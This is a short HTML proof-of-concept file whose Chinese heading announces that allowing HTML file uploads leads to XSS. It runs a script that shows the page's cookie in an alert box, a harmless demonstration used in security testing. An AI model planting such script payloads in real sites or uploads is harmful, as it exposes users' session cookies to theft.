<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>HTML类型</title>
</head>
<body>
  <h1>可上传HTML类型文件导致XSS!</h1>
  <script>alert(document.cookie)</script>
</body>
</html>